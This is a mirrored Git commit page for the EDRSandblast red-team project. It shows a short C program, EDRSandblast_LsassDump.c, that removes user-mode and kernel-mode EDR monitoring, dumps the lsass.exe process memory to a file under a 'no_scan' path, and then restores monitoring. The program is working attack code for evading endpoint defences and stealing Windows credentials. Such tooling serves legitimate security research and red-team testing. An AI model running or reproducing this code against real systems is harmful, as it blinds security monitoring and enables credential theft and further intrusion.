Mirrors/wavestone-cdt-edrsandblast
1
0
Fork 0
mirror of https://github.com/wavestone-cdt/EDRSandblast.git synced 2026-06-11 01:41:20 +00:00
Code Issues Packages Projects Releases Wiki Activity

D3FC0N 30 release: Obj callbacks, firewalling, symbols w/ internet, and more

Browse Source 
Co-authored-by: Maxime Meignan <maxime.meignan@wavestone.com>
This commit is contained in:
Qazeer
2022-08-13 09:23:48 -07:00
parent 2e037a379b
commit 48a75a7029
91 changed files with 10503 additions and 4414 deletions
Download Patch File Download Diff File Expand all files Collapse all files
EDRSandblast_LsassDump/EDRSandblast_LsassDump.c
+31
View File
@@ -0,0 +1,31 @@
#include "../EDRSandblast_StaticLibrary/EDRSandblast_API.h"
#include <stdio.h>
#pragma comment(lib, "Dbghelp.lib")
#pragma comment(lib, "Version.lib")
#pragma comment(lib, "Winhttp.lib")
#pragma comment(lib, "EDRSandblast_Core.lib")
#pragma comment(lib, "EDRSandblast_StaticLibrary.lib")
#pragma comment(lib, "Pathcch.lib")
#pragma comment(lib, "Shlwapi.lib")
int main()
{
EDRSB_CONTEXT ctx = { 0 };
EDRSB_CONFIG cfg = { 0 };
cfg.bypassMode.Usermode = TRUE;
cfg.bypassMode.Krnlmode = TRUE;
cfg.offsetRetrievalMethod.Internet = TRUE;
cfg.offsetRetrievalMethod.File = TRUE;
EDRSB_STATUS status;
if (status = EDRSB_Init(&ctx, &cfg) != EDRSB_SUCCESS) {
printf("EDRSB_Init: %u", status);
}
Usermode_RemoveAllMonitoring(&ctx, Find_and_use_existing_trampoline);
Krnlmode_RemoveAllMonitoring(&ctx);
Action_DumpProcessByName(&ctx, L"lsass.exe", L"C:\\no_scan\\tmp\\tmp.tmp", Find_and_use_existing_trampoline);
Krnlmode_RestoreAllMonitoring(&ctx);
EDRSB_CleanUp(&ctx);
}